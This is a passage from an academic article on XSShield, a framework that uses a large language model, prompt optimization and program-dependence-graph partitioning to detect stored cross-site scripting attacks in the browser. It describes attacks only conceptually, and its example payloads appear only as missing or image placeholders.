Next Article in Journal
Transformer Self-Attention Change Detection Network with Frozen Parameters
Previous Article in Journal
Use of Alternative Materials in Sustainable Geotechnics: State of World Knowledge and Some Examples from Poland
 
 
Font Type:
Arial Georgia Verdana
Font Size:
Aa Aa Aa
Line Spacing:
Column Width:
Background:
Article

XSShield: Defending Against Stored XSS Attacks Using LLM-Based Semantic Understanding

College of Computer Science and Technology, National University of Defense Technology, No.137 Yanwachi Street, Changsha 410073, China
*
Author to whom correspondence should be addressed.
These authors contributed equally to this work.
Appl. Sci. 2025, 15(6), 3348; https://doi.org/10.3390/app15063348
Submission received: 17 February 2025 / Revised: 8 March 2025 / Accepted: 10 March 2025 / Published: 19 March 2025

Abstract

:
Cross-site scripting attacks represent one of the major security threats facing web applications, with Stored XSS attacks becoming the predominant form. Compared to reflected XSS, stored XSS attack payloads exhibit temporal and spatial asynchrony between injection and execution, rendering traditional browserside defenses based on request–response differential analysis ineffective. This paper presents XSShield, the first detection framework that leverages a Large Language Model to understand JavaScript semantics to defend against Stored XSS attacks. Through a Prompt Optimizer based on gradient descent and UCB-R selection algorithms, and a Data Adaptor based on program dependence graphs, the framework achieves real-time and fine-grained code processing. Experimental evaluation shows that XSShield achieves 93% accuracy and an F1 score of 0.9266 on the GPT-4 model, improving accuracy by an average of 88.8% compared to existing solutions. The processing time, excluding model communication overhead, averages only 0.205 s, demonstrating practical deployability without significantly impacting user experience.

1. Introduction

Cross-site scripting (XSS) attacks represent one of the primary security threats facing web applications today. As an authoritative reference for web security, the OWASP Top 10 [1] has reflected the industry’s broad consensus on web application security risks since 2003, with XSS attacks consistently ranking in the top ten. In the latest 2021 edition, XSS attacks ranked third (as a major type of injection vulnerability), demonstrating their continued impact on web security. Furthermore, HackerOne’s Hacker-Powered Security Report [2] indicates that XSS vulnerabilities have consistently ranked first among the top ten vulnerabilities disclosed in bug bounty programs for several consecutive years.
Common XSS attacks are primarily categorized into reflected and stored types. In recent years, stored XSS attacks have emerged as the predominant form of XSS attacks, with both their severity and frequency steadily increasing. According to statistics from the official CVE list [3], among the 28,000 vulnerabilities disclosed in 2023, XSS vulnerabilities accounted for 13.2%, with stored XSS attacks comprising 59.5% of these cases, involving over 2200 incidents. A notable example is the stored XSS vulnerability (CVE-2023-40000) [4] discovered in WordPress’s LiteSpeed Cache plugin, which allowed unauthenticated attackers to inject malicious code across entire websites, affecting millions of WordPress sites and demonstrating the widespread impact of stored XSS attacks. The threat of stored XSS attacks further intensified in the first half of 2024, with stored XSS attacks accounting for 15.1% of the 8600 disclosed CVE vulnerabilities, involving over 1300 cases.
The escalating severity of stored XSS attacks can be attributed primarily to their paradigmatic difference from reflected XSS attacks and the long-standing absence of effective defense techniques. While mainstream browsers can identify and block reflected XSS attacks through differential analysis of HTTP requests and responses where injection and execution occur within the same user’s browser, stored XSS attacks present unique challenges due to their temporal and spatial asynchrony between injection and execution phases. In stored XSS attacks, malicious code is typically pre-injected by attackers into server-side systems (such as databases, file systems, or caches) and remains dormant until triggered by users across different sessions and extended time intervals. This temporal and spatial decoupling renders traditional browser-based defense mechanisms ineffective [5], as they struggle to establish correlations between the payload about to be executed and its original injection path, making detection methods based on request–response differential analysis inadequate for addressing stored XSS vulnerabilities.
Specifically, effectively defending against stored XSS attacks faces two key challenges: (1) Difficulty in attack vector localization and identification: Stored XSS malicious code persists on the server side, making traditional differential analysis ineffective in correlating injection and execution paths. Additionally, attackers may employ code obfuscation and camouflage techniques to hide attack code, increasing the difficulty of detection through pattern-matching methods. (2) High requirements for real-time and fine-grained defense systems: In practical application scenarios, attackers often embed malicious code within large amounts of normal code, requiring defense systems to not only quickly identify malicious code to avoid increasing webpage loading delays in users’ browsers but also precisely locate attack code segments to prevent disabling normal webpage functionality over too broad a range. Therefore, defense systems must simultaneously meet high efficiency and high precision requirements.
To address the first challenge, we propose XSShield, a novel client-side detection framework designed to leverage Large Language Models (LLMs) for in-depth semantic analysis of code received by browsers from servers to determine whether it contains potential malicious payloads. Compared to traditional detection methods, XSShield’s uniqueness lies in its ability to achieve detection without relying on differential analysis by deeply understanding code behavior logic and semantic intent, thus overcoming the constraints of “temporal–spatial decoupling”. Furthermore, this approach better handles obfuscated and disguised attack techniques, enhancing detection robustness and flexibility, effectively addressing the limitations of traditional methods when facing complex attack vectors.
To address the second challenge, we designed and implemented two core components of XSShield: (1) Prompt Optimizer, which dynamically learns and selects optimal prompts based on semantic gradient descent and Upper Confidence Bound Bandits with Weighted Randomization (UCB-R) selection algorithms, enabling accurate distinction between malicious and normal code using general pre-trained models, featuring lightweight and easy deployment characteristics while significantly improving detection accuracy without notably increasing time costs. (2) Data Adaptor, which utilizes program dependence graphs (PDGs) and PDG subgraph-partitioning techniques to parse complex JavaScript programs into logically independent code segments while preserving key semantics closely related to control flow. This process ensures framework real-time performance and logical integrity during code analysis, achieving efficient deconstruction of complex code structures. Through fine-grained modeling of program dependencies, the Data Adaptor enables, in the framework, more precise identification and processing of code segments containing malicious payloads.
Experimental results demonstrate XSShield’s exceptional detection accuracy and efficiency. Using GPT-4 as the intelligence foundation, it achieves 93% accuracy and an F1 score of 0.9266 in detecting non-obfuscated attack samples, showing an average 88.8% improvement in accuracy compared to existing malicious code detectors such as Cujo, Zozzle, and JStap (as existing detectors generally struggle to detect stored XSS attacks). Even when facing obfuscated attack samples, XSShield maintains a 64.92% detection rate and a 0.7018 F1 score. Additionally, in terms of performance, XSShield’s average processing time per file is only 0.205 s (excluding model communication overhead), comparable to other detectors’ processing times, demonstrating no significant impact on user experience and proving the framework’s practical deployability.
In summary, the main contributions of this work include:
  • New framework. We propose XSShield, the first detection framework leveraging LLMs’ code semantic understanding capabilities to defend against stored XSS attacks. This framework transcends traditional detection paradigms based on differential analysis and regular expression matching by deeply understanding JavaScript code’s behavioral patterns and semantic intentions, pioneering new approaches to defending against stored XSS attacks.
  • Lightweight, effective and efficient approach. We designed a Prompt Optimizer based on semantic gradient descent and UCB-R selection algorithms, along with a Data Adaptor based on PDGs, achieving code processing that balances real-time performance with fine granularity. Experimental evaluation of XSShield shows that when facing non-obfuscated stored XSS attacks, XSShield achieves an F1 score of 0.9266 on the GPT-4 model, significantly outperforming existing solutions with an average accuracy improvement of 88.8%. XSShield’s average processing time in test data is 0.205 s (excluding model communication overhead), maintaining detection precision while keeping time overhead within a range that does not affect user experience, demonstrating practical deployability.
  • Novel insights. Through extensive experiments and analysis, we uncover several key findings about LLM-based XSS attack defense: (1) the critical role of semantic-aware code representation in attack detection, (2) the impact of prompt optimization on detection accuracy, and (3) the trade-offs between model complexity and detection performance. These insights provide valuable guidance for future research in LLM-based security applications.
The remainder of this paper is organized as follows: Section 2 presents related work on XSS defense techniques and malicious JavaScript detection. Section 3 provides background on XSS attack mechanisms and the challenges in defending against them. Section 4 describes our proposed XSShield framework in detail, including the Prompt Optimizer and Data Adaptor components. Section 5 presents experimental results and evaluation. Section 6 discusses the implications of our approach, addresses its limitations, and outlines directions for future work. Finally, Section 7 concludes the paper.

2. Backgroud and Motivation

2.1. XSS Attack Mechanisms

XSS is a type of security vulnerability that allows attackers to inject malicious client-side code (typically JavaScript) into web pages viewed by other users. When users visit these compromised pages, the injected code executes in their browsers within the security context of the vulnerable website, potentially leading to severe security consequences. XSS attacks can result in unauthorized access to user data, session hijacking, cookie theft, credential harvesting, and website content tampering [1,6].
The core mechanism of XSS attacks exploits the trust relationship between users and websites. When a website fails to properly validate, sanitize, or encode user-supplied input before incorporating it into its output HTML, attackers can insert malicious scripts that browsers will interpret as legitimate code from the trusted domain. As web applications become increasingly prevalent and complex, the threats posed by XSS attacks continue to escalate, making the in-depth research and development of effective defense methods a critical topic in cybersecurity. Figure 1 illustrates the different types of XSS attacks.
XSS attacks can be categorized into two major types based on how the malicious payload is delivered and made to persist: reflected XSS and stored XSS.
Reflected XSS (non-persistent XSS) is a form of immediate execution attack characterized by embedding malicious scripts within user requests sent to the server, which, without proper validation, are directly reflected back to the user’s browser for execution. This type of attack typically requires active user triggering, such as clicking specific URLs or submitting forms containing malicious payloads. For example:
In this scenario, the malicious script is embedded in the URL query parameter, which is then reflected in the search results page without proper sanitization. For reflected XSS, researchers have developed various effective runtime detection and elimination techniques, such as intercepting scripts after HTML parsing and skipping malicious scripts during the parsing phase. These traffic monitoring-based defense methods can capture the immediate characteristics of attacks, effectively identifying and blocking reflected XSS attacks [7].
In contrast, stored XSS (persistent XSS) exhibits significantly different characteristics, presenting greater challenges for defense. Stored XSS attacks persistently store malicious scripts in the target server’s backend systems (such as databases, file systems, or caches), creating a distinct temporal asynchronicity between the injection and execution phases [8]. For instance:
In this example, the malicious payload is stored in the user’s profile (perhaps as a comment or profile description) and executed whenever any user views the profile page. This characteristic makes traditional traffic monitoring-based defense measures inadequate in simultaneously capturing both the injection and execution processes, resulting in significant limitations when addressing stored XSS. Furthermore, stored XSS attacks have higher stealth and broader impact, as their malicious scripts can execute automatically when infected pages are visited, requiring no active user interaction [7].
The severity of stored XSS attacks lies in how their complex operational characteristics further amplify threats to web security. The persistence mechanism allows malicious scripts to remain dormant for extended periods and execute automatically upon user access, forming a persistent attack vector. These malicious codes seamlessly integrate with legitimate web content, demonstrating strong stealth capabilities [9]. A single injection can affect numerous users, creating a multiplier effect, particularly on platforms relying on user-generated content [10]. Moreover, users typically lack security vigilance when interacting with familiar, trusted websites, and stored XSS’s ability to circumvent common defense measures’ limitations further increases the difficulty of defense.
The importance of LLMs in reshaping the landscape of cybersecurity analysis is increasing. With their exceptional capabilities in understanding code structures, identifying patterns, and parsing semantic relationships, LLMs are gradually becoming core components of security analysis systems. Practice has shown that integrating LLMs into security workflows can significantly improve efficiency; for example, LLM-based code scanning systems have demonstrated detection rates several times higher than traditional methods [11,12]. This breakthrough development reflects the deep integration trend between artificial intelligence and cybersecurity, not only pioneering more intelligent security solution pathways but also demonstrating significant value in identifying and defending against complex attack vectors [13,14].

2.2. Motivation

Existing stored XSS defense mechanisms have inherent limitations, highlighting the urgency with respect to developing innovative solutions. Content Security Policy (CSP), as a declarative security measure, heavily depends on the integrity of server-side configurations for its effectiveness. Once attackers gain server access, they can tamper with or disable CSP directives, rendering the defense ineffective [15,16,17]. Additionally, the complexity of CSP implementation and compatibility issues limits its widespread adoption.
Sandbox mechanisms provide protection by executing potentially malicious code in isolated environments, but their practical application faces numerous limitations. Evolving sandbox bypass techniques and limitations in sandbox defense capabilities make it difficult to provide uniform, reliable protection across different systems and browser versions [18]. Furthermore, sandboxes have limited defense scope and are vulnerable to complex side-channel attacks [19].
Traditional filtering techniques [20,21,22,23,24,25,26,27] such as input validation and output encoding are increasingly struggling to cope with modern stored XSS attacks. When servers are compromised, attackers can bypass or disable these protective measures, rendering them ineffective against persistent threats.
These issues are particularly prominent in environments where server integrity cannot be guaranteed, urgently necessitating the redesign of defense strategies. Our research specifically focuses on detecting stored XSS attack vectors in such scenarios where server trustworthiness is compromised. While most existing XSS defense mechanisms operate under the assumption of trusted server environments, this assumption often fails to hold in real-world attack contexts.

2.3. Challenges

In developing effective defense methods against stored XSS attacks, we face two key technical challenges:
The first challenge is the difficulty of attack vector location and identification. In real-world Web applications, attack code is typically intertwined with large amounts of normal business code, placing stringent requirements on defense systems. On one hand, the system needs to identify and intercept suspicious code in extremely short time frames to prevent attack code execution; on the other hand, it must precisely distinguish between attack code and normal code to avoid affecting normal business logic. Modern Web development techniques widely employing code obfuscation, third-party libraries, and dynamic script generation further increase the complexity of code analysis. Defense systems need to maintain sufficient processing speed while ensuring high precision; otherwise, they risk excessive interception or untimely defense. This pattern complexity and dynamicity of attack vectors present significant challenges to identification work.
The second challenge is the high requirements for real-time and fine-grained defense systems. Facing the persistent threat of stored XSS attacks, defense systems must be capable of continuous monitoring and real-time response to malicious behavior. Traditional post-event analysis and coarse-grained protection measures struggle to meet this requirement. Real-time defense requires fine-grained monitoring of application execution processes without affecting user experience, promptly detecting and blocking attack attempts. This poses severe challenges to system performance. Additionally, real-time defense must minimize impact on normal functionality while accurately identifying attacks. This requires precise dynamic balancing between security and performance, ensuring effective attack interception while avoiding business interruptions due to excessive defense. This balance between high real-time capability and fine granularity represents a major challenge in defense system design.

3. XSShield Design

To address the challenges in detecting and defending against Stored XSS attacks, this research presents the XSShield framework based on LLMs. The framework enhances detection and defense capabilities through understanding code semantics. Figure 2 illustrates XSShield’s system architecture, with core components including the “Prompt Optimizer” and “Data Adaptor”.
The main technical innovations of this research focus on two aspects: Prompt Optimizer: Achieving optimal prompt dynamic selection by combining semantic gradient descent and UCB-R selection algorithms to maximize attack vector detection accuracy. Data Adaptor: Promoting code analysis using PDG and its subgraph-partitioning techniques.
  • Solution for Challenge 1: LLM-based Semantic Analysis
XSShield addresses the challenge of attack vector identification through LLM-driven deep semantic analysis. Compared to traditional differential analysis methods, XSShield performs comprehensive behavioral and semantic analysis of server-received code to detect potential malicious payloads. The framework effectively identifies attack vectors utilizing obfuscation and disguise techniques through optimized LLM prompts. This approach not only overcomes the limitations of pattern-matching methods but also eliminates dependency on temporal coupling between injection and execution.
  • Solution for Challenge 2: Efficient and Precise Detection Components
To meet stringent performance and precision requirements, XSShield implements two key components:
Prompt Optimizer: This component combines semantic gradient descent and UCB-R selection algorithms to dynamically learn and select optimal prompts. It leverages pre-trained models to accurately distinguish between malicious and normal code, achieving lightweight deployment while maintaining high detection precision without significantly increasing performance overhead.
Data Adaptor: This component employs PDG and PDG subgraph-partitioning techniques to decompose complex JavaScript programs into logically independent code segments while preserving control flow-related semantic information. Through fine-grained modeling of program dependencies, it precisely identifies code segments containing malicious payloads while ensuring real-time performance and logical integrity.
The XSShield framework adopts a semi-automated approach, requiring only the following data for initialization: (1) initial prompt, (2) common JavaScript malicious code samples, (3) benign JavaScript code samples from trusted sources. Additionally, users can provide supplementary attack samples to enhance the prompt-optimization process, improving the effectiveness of final prompts. Through this approach, XSShield can continuously adapt to emerging attack patterns, maintaining the effectiveness of its detection and defense capabilities.

3.1. Prompt Optimizer

We propose a systematic prompt-optimization system to enhance the performance of LLMs in detecting stored XSS attack vectors. This framework comprises three core modules: Prompt Expander implementing semantic gradient descent in discrete optimization space, Prompt Selector based on a UCB-R selection algorithm for balancing exploration and exploitation, and an Optimization Orchestrator implementing adaptive closed-loop optimization. Through this comprehensive approach, we significantly improve prompt effectiveness without modifying the underlying model architecture.

3.1.1. Prompt Expander

The Prompt Expander implements gradient descent mechanics in semantic space through three phase-locked steps: (1) performance evaluation (forward pass) identifying label-prediction mismatches, (2) semantic gradient generation (backward pass) translating errors into natural-language optimization directions, and (3) prompt updates adjusting instructions against computed gradients—all without differentiable parameters. The module optimizes prompts through directional gradient updates in semantic space. This optimization process encompasses three interrelated steps: prompt evaluation, semantic gradient generation, and gradient-based prompt updates, all implemented by designing prompts to guide the LLM, systematically expanding the search space while maintaining semantic coherence. The specific prompt usage is detailed in Appendix B.
Evaluation Phase: We utilize the base model (the LLM used for evaluation) to assess each prompt’s performance on predefined train sets. Given a set of prompt candidates P, for each prompt p i P , we extract a batch sample from training data D t r a i n s a m p l e to efficiently obtain prediction results. Subsequently, we identify samples where predicted labels differ from true labels, defining them as mismatched samples D m i s m a t c h = { d j p r e d j l a b e l j , d j D t r a i n _ s a m p l e } , which serve as the foundation for subsequent optimization.
Gradient Generation Phase: We transform mismatched samples into actionable optimization directions. We analyze error patterns and generate semantic gradients in natural language description form. Compared to traditional numerical gradients, these semantic gradients capture subtle characteristics of prompt deficiencies, providing explicit directional guidance for improvements in semantic space. We design specialized prompts to analyze different types of errors and generate corresponding semantic guidance, effectively identifying specific aspects of prompts requiring enhancement.
Prompt-Update Phase: We implement targeted corrections based on identified deficiencies. This process addresses specific issues through directional edits, adjusting prompts in the opposite direction of semantic gradients. Each optimized prompt is added to the prompt candidates set P, continuously enriching the optimization space.

3.1.2. Prompt Selector

The core challenge in prompt selection lies in effectively balancing exploration of new prompts with exploitation of validated effective prompts. We address this challenge through a UCB-R selection algorithm that combines Upper Confidence Bound principles with weighted random selection strategies.
The algorithm maintains comprehensive performance metrics for each prompt, including success count s i and failure count f i , both initialized to 1. The UCB score calculation combines empirical performance and exploration potential:
UCB i = s i s i + f i + c ln N s i + f i
where the exploration coefficient c dynamically adjusts with total iteration count N: c = c 0 / N , ensuring smooth transition from exploration to exploitation. Unlike traditional UCB selection algorithms that select only the highest-scoring prompt, the UCB-R selection algorithm employs UCB score-weighted random selection, gradually focusing on the most effective candidates while maintaining prompt selection diversity.

3.1.3. Optimization Orchestrator

The Optimization Orchestrator coordinates the entire optimization workflow through an iterative process described in Algorithm 1. To rigorously evaluate performance, we employ a comprehensive loss function to measure cumulative prompt effectiveness over T optimization rounds:
Loss = 1 T | D test | i = 1 T Manh ( pred p ( D test ) , label ( D test ) )
where Manh represents Manhattan distance (calculated as the sum of absolute differences between vector components), defined as M a n h ( A , B ) = i | A i B i | . Based on this metric, the optimal prompt p * is formally defined as:
p * = arg min p P 1 | D test | Manh ( pred p ( D test ) , label ( D test ) )
To balance evaluation accuracy and computational efficiency, we implement a refined batch sampling strategy during training and testing phases. Prompt performance scores directly update UCB statistics, forming a robust feedback loop that continuously guides the optimization process toward more effective prompts.

3.2. Data Adaptor

Precise detection of stored XSS attacks through prompt optimization requires a sophisticated data-adaptation process. This process transforms JavaScript code extracted from browsers into formats suitable for LLM analysis. Our process contains three core components, PDG Generator, PDG Partitioner, and Code Representation Generator, each serving specific functions in the adaptation process.

3.2.1. PDG Generator

The PDG is an advanced extension of the Abstract Syntax Tree (AST), integrating control and data dependency information. This integration enhances code deconstruction and analysis efficiency through fine-grained AST operations, particularly benefiting code logical partitioning and behavioral representation.
Algorithm 1 Prompt-Optimization Workflow.
  • Input: Initial prompt p 0 , datasets D train , D test , exploration coefficient c 0 , epochs T, selection size k
  • Output: Optimized prompt p * and prompt set P
  • /* Prompt Expander */
1:
procedure PromptExpander( p , D train )
2:
     D sample Sample ( D train ,   batch_size )
3:
     p r e d EvaluatePrompt ( p , D sample )
4:
     D mismatch { d j pred j label j }
5:
     gradient GenerateGradient ( p , D mismatch )
6:
    return  UpdatePrompt ( p , gradient )
7:
end procedure
/* Prompt Selector */
8:
procedurePromptSelector( P , D test , c , s , f , N )
9:
     D sample Sample ( D test ,   batch_size )
10:
    for all  p i P  do
11:
         L o s s i 1 | D test | Manh ( pred p i ( D test ) , label )
12:
         score i 1 L o s s i
13:
         sampled_prompts weighted_rand k p i P ( s i s i + f i + c ln N s i + f i )
14:
         s i s i + score i × | D sample |
15:
         f i f i + ( 1 score i ) × | D sample |
16:
    end for
17:
    return  sampled_prompts , s , f
18:
end procedure
/* Optimization Orchestrator */
19:
Initialize P { p 0 } , s , f 1 | P | , L o s s b e s t
20:
for epoch t = 1 to T do
21:
     P expanded P
22:
    for all  p i P  do
23:
         p new PromptExpander ( p i , D train )
24:
         P expanded P expanded { p new }
25:
    end for
26:
     P , s , f PromptSelector ( P expanded , D test , c , s , f , t )
27:
     c c 0 / t
28:
    for all  p i P  do
29:
         L o s s i 1 | D test | Manh ( pred p i ( D test ) , label )
30:
        if  L o s s i < L o s s b e s t  then
31:
            L o s s b e s t L o s s i
32:
            p * p i
33:
        end if
34:
    end for
35:
end for
36:
return  p *
PDG Construction adopts a systematic approach to transform JavaScript code into complete dependency graphs. The process begins with parsing code into AST to establish hierarchical structure, followed by multi-stage transformation: First, comprehensive analysis of data and control flow dependencies maps variable definitions and references through systematic AST traversal, establishing data dependency edges. Simultaneously, analysis of program branch patterns and conditional logic establishes control dependency relationships, ensuring accurate representation of execution paths. Finally, expression nodes in the PDG (operations such as assignments and calculations, derived from Esprima) and their subtrees are identified and integrated as semantically complete units for subsequent analysis. Here, we reference the implementation from GitHub repository [28] for PDG construction.
PDG Pruning employs three optimization strategies to improve PDG efficiency while preserving core semantic information: control flow optimization, data flow optimization, and dead code elimination.
Control Flow Optimization. This merges statement nodes with single child nodes into unified nodes while preserving parent–child information. For each statement node s with a single child node c, it performs folding operations to create compound nodes, reducing graph complexity while maintaining control flow semantics integrity.
Data Flow Optimization. This implements two complementary mechanisms: constant propagation and copy propagation. Constant propagation identifies and propagates statically computable expressions in the graph, while copy propagation tracks assignment operations, optimizing variable usage by replacing copied variables with original values. These mechanisms work collaboratively to enhance code efficiency through systematic value propagation and variable optimization.
Dead Code Elimination. This focuses on removing two types of redundant code: print operations used for debugging or logging, and executable but unused code segments. This systematic elimination significantly reduces PDG size while maintaining program core logic and functionality.

3.2.2. PDG Partitioner

We propose a novel partitioning method for PDGs of large-scale JavaScript programs, employing an optimized community detector. This method aims to decompose PDGs into logical subgraphs to simplify analysis while preserving fundamental semantic properties of the original program. To achieve this, we developed an enhanced partitioning strategy that emphasizes the distinctions between control flow and data flow dependencies. Recognizing that control flow typically contains more critical program semantics, our method assigns higher importance to control flow dependencies to better maintain functional integrity of partitioned PDGs.
As shown in Algorithm 2, the method encompasses two core phases: weighted graph construction and community detection. The relevant symbols are defined as follows:
G = ( V , E , w ) : Weighted undirected graph derived from PDG.
w c , w d : Weights for control flow and data flow edges.
θ a s t : Upper limit of AST nodes allowed in each community.
Q: Modularity measure for community detection.
N A S T ( C ) : Number of AST nodes in community C.
Phase 1: Weighted Graph Constructor. The first phase involves transforming the input PDG into a weighted undirected graph G. Edges representing control flow dependencies are assigned higher weights ( w c ), while edges representing data flow dependencies receive lower weights ( w d ). This weighting scheme ( w c w d ) emphasizes the critical role of control flow in determining code functional structure.
Phase 2: Enhanced Community Detector. The second phase employs an improved variant of the Louvain algorithm, specifically adapted for JavaScript’s unique characteristics. This enhanced algorithm optimizes the modularity measure Q, calculated as:
Q = 1 2 m i , j w i j k i k j 2 m δ ( c i , c j ) λ C max ( 0 , N A S T ( C ) θ a s t )
where m denotes the total edge weight, w i j represents the weight of the edge between nodes i and j, k i is the weighted degree of node i, and c i represents the community containing node i. The Kronecker delta function δ is used to assess whether nodes i and j belong to the same community. The additional penalty term λ C max ( 0 , N A S T ( C ) θ a s t ) ensures that the number of AST nodes in each community remains below the predefined limit θ a s t , where λ is a penalty coefficient that controls the importance of this constraint.
Algorithm 2 PDG Partitioning via Community Detection.
  • Input: Program Dependency Graph G ( V , E ) , control weight w c , data weight w d , AST node limit θ a s t
  • Output: Set of program subgraphs S
  • /* Phase 1: Weighted Graph Constructor */
1:
for all each edge e E  do
2:
    if  e ControlFlow ( G )  then
3:
         w ( e ) w c
4:
    else
5:
         w ( e ) w d
6:
    end if
7:
end for
/* Phase 2: Enhanced Community Detector */
8:
C { { v } : v V }
9:
Q prev
10:
Q curr Modularity ( G , C )
11:
while  Q curr > Q prev   do
12:
    for all each v V  do
13:
         c * arg max c C Q ( v , c )
14:
        if  N A S T ( c * ) + ASTNodes ( v ) θ a s t  then
15:
           Reassign v to community c *
16:
        else
17:
           Create new community for v
18:
        end if
19:
    end for
20:
     C Aggregate ( C )
21:
     Q prev Q curr
22:
     Q curr Modularity ( G , C )
23:
end while
24:
return  C
During community detection, we ensure that the number of AST nodes in each community does not exceed the predefined limit θ a s t . If adding a node to a community would result in N A S T ( C ) > θ a s t , that node is assigned to a different community or creates a new one. This ensures that generated subgraphs, when provided as input to the LLM, maintain controlled token length.
Our modifications to the Louvain algorithm [29] aim to maximize Q while efficiently identifying well-formed, functionally meaningful subgraphs consistent with JavaScript program structures. The modularity gain Q when relocating node i to community C is calculated as:
Q = Σ i n + k i , i n 2 m Σ t o t + k i 2 m 2 Σ i n 2 m Σ t o t 2 m 2 k i 2 m 2 λ · N A S T ( C )
where Σ i n represents the total weight of edges within community C, k i , i n is the weight of edges connecting node i to other nodes in community C, Σ t o t represents the total weight of all edges connected to nodes in community C, k i is the total weight of all edges connected to node i, and N A S T ( C ) represents the change in AST node constraint when adding node i to community C. Through this penalty term, the modularity calculation directly incorporates AST node constraints.
Through this method, our enhanced community-detection algorithm efficiently identifies well-structured and functionally clear subgraphs that maintain consistency with the overall structure of JavaScript programs.

3.2.3. Code Representation Generator

We achieved a Code Representation Generator capable of transforming PDGs into optimized formats adapted for LLM while ensuring semantic integrity. After completing PDG construction and logical subgraph partitioning, this generator utilizes native code format to generate code representations specifically for LLM analysis, thereby fully leveraging LLM’s advantages in processing source code.
The generator employs a two-phase processing approach: the first phase systematically traverses AST nodes in the PDG, maintaining the program’s original structure through explicit mapping of control and data flow dependencies; the second phase performs controlled code restructuring, preserving key semantic associations identified during dependency analysis by applying context-aware transformation rules that prioritize critical program behaviors. The entire transformation process consistently follows strict semantic fidelity protocols verified through cross-validation with original program-execution traces.
The final generated code representation serves as behavioral features, effectively preserving the structural characteristics and semantic properties of the target program. This approach ensures direct compatibility with LLM processing mechanisms while retaining the program’s core semantics, simultaneously avoiding redundant factors that might affect analysis through systematic pruning of non-essential code constructs. Following minimalist design principles, the generator preserves only necessary constructs required for capturing behavioral patterns, including control flow statements, data dependencies, and critical API calls, while eliminating redundant expressions and non-essential variables. The generator’s effectiveness is further validated through comparative analysis with alternative representation methods, demonstrating superior performance in behavioral pattern retention and LLM compatibility.

3.3. LLM-Based Detector

The framework adopts a pre-trained LLM (e.g., GPT-3.5-turbo) as the base model without additional fine-tuning. This design choice leverages the model’s inherent code-comprehension capability while avoiding the computational overhead of model retraining. The detection capability is achieved through our innovative prompt optimization rather than model parameter updates.
Based on the extraction and processing of multiple candidate code segments from the target code described in Section 3.2, we constructed a pre-trained LLM-based detection framework. This framework operates using prompts that have undergone comprehensive training optimization as detailed in Section 3.1. Our prompt-engineering approach integrates both semantic precision and structural optimization dimensions to enhance model-understanding capabilities for specific tasks.
Structured Output. To achieve reliable binary classification, we designed an output-control mechanism. This mechanism enforces model responses to begin with “yes” or “no” by adding a format requirement to the base prompt. Specifically, the instruction “answer with ‘yes’ or ‘no”’ is appended to the original prompt. This design not only improves classification accuracy but also eliminates output ambiguity. The output-control mechanism is formally expressed as:
P r o m p t f i n a l = P r o m p t o r i g i n a l + answer with yes or no
where P r o m p t o r i g i n a l is the initial training prompt, and the additional instruction ensures that the model’s response starts with “yes” or “no”. P r o m p t f i n a l is the complete prompt sequence used for model queries.
This structured approach ensures consistency and accuracy in LLM outputs, enabling the framework to reliably identify potential attack vectors in code segments while maintaining high detection accuracy.

4. Experiment

4.1. Implementation

Evaluation Set. This research implemented the XSShield framework as a browser extension, drawing upon relevant code from previous research [30]. The extension is designed to intercept JavaScript payloads during webpage rendering through strategic hook injection into XMLHttpRequest and fetch API, enabling comprehensive monitoring of both static and dynamically loaded script content.
The evaluation methodology employed a target drone containing stored XSS vulnerabilities, tested against 610 diverse XSS attack samples. This dataset comprised 305 attacks derived from the BeEF repository [31], carefully selected to encompass all attack modules categorized within the framework. For example, Listing 1 shows a typical stored XSS attack fragment that detects ActiveX components in a victim’s browser and reports the findings back to the attacker’s server.
Listing 1. A code fragment demonstrating ActiveX component detection via stored cross-site scripting vulnerability.
Applsci 15 03348 i001
Additionally, 305 obfuscated attack variants were generated by applying the JavaScript-Obfuscator tool [32] with default configuration settings to the original BeEF samples. This configuration implemented multiple obfuscation techniques, including variable renaming, string array transformation, and string array rotation and shuffling.
All attack samples were derived from JavaScript engine-execution traces, forming the malicious evaluation set. These attacks can be categorized into information reconnaissance, unauthorized resource access, cross-platform mobile application attacks, social engineering-driven persistent threats, auxiliary operation support, and cross-protocol attack paths. Each category is detailed in Appendix A.
To establish a balanced evaluation methodology, 305 low-redundancy benign samples were selected from the JS150k dataset based on Jaccard similarity. The selection process identified and chose the 305 samples with the lowest Jaccard similarity scores to ensure maximum diversity and minimal redundancy in the benign dataset.
For experimental consistency, GPT-turbo-3.5 was utilized for prompt optimization and testing, with standardized LLM parameters (top_k = 1, temperature = 0). A consistent system prompt was maintained across all experiments, with complete details provided in Figure A1a.
Experiment Platform Setup. Prompt training was conducted on a Windows Server 2016 server configured with an Intel(R) Xeon(R) Gold 6248R processor (Intel, Santa Clara, CA, USA) at 3.00 GHz and 384 GB memory. Attack experiments were executed on a Linux server running Ubuntu 22.04.4 LTS, serving as both attack platform and target machine. This Linux server was equipped with an AMD(R) Ryzen 7 7800X3D 8-core processor (AMD, Santa Clara, CA, USA) and 16 GB memory.

4.2. Evaluation

This section presents a comprehensive experimental evaluation of the XSShield framework, focusing on three key research questions:
  • RQ1—Comparativeness: What advantages does the XSShield framework offer compared to existing mainstream malware-detection tools? We evaluate the framework’s defense effectiveness against various attack vectors and compare it with other SOAT open source malware detectors to identify its advantages.
  • RQ2—Effectiveness: Are all components of XSShield performing their intended functions? This question is addressed by analyzing each module’s contribution to the framework’s overall accuracy and defense capabilities.
  • RQ3—Efficiency: How much runtime overhead does the code-transformation process introduce? We quantify the framework’s time consumption through detailed performance analysis.
To systematically address these research questions, we designed and conducted a series of experiments. First, we used BeEF attack samples and benign code samples as an evaluation set to comparatively analyze the performance differences between our framework and existing open-source malware-detection tools. Second, we individually tested the effectiveness of each XSShield module. Finally, we evaluated the framework’s performance overhead and resource utilization through rigorous test suites to verify its feasibility in practical application environments.

4.2.1. Experimental Setup

Development Set. To support the training of prompts and malware detectors, this research employed multiple annotated and authoritative datasets, as shown in Table 1. Initially, we introduced a dataset containing 150,000 benign JavaScript samples [33] sourced from GitHub repositories, which has been widely used in JavaScript malware detection. Notably, 305 low-redundancy samples were excluded from the development set to ensure data independence and reliability. Additionally, the malicious samples used in the development set came from three datasets: VirusTotal [34], Hynek Petrak’s JavaScript Malware Collection [35], and GeeksOnSecurity’s JavaScript Malicious Code Dataset [36]. These datasets contain diverse JavaScript malicious code, including multi-source detection results, specially maintained malicious code collections, and samples from actual network attacks. The comprehensive utilization of these datasets effectively enhanced malware detector performance.
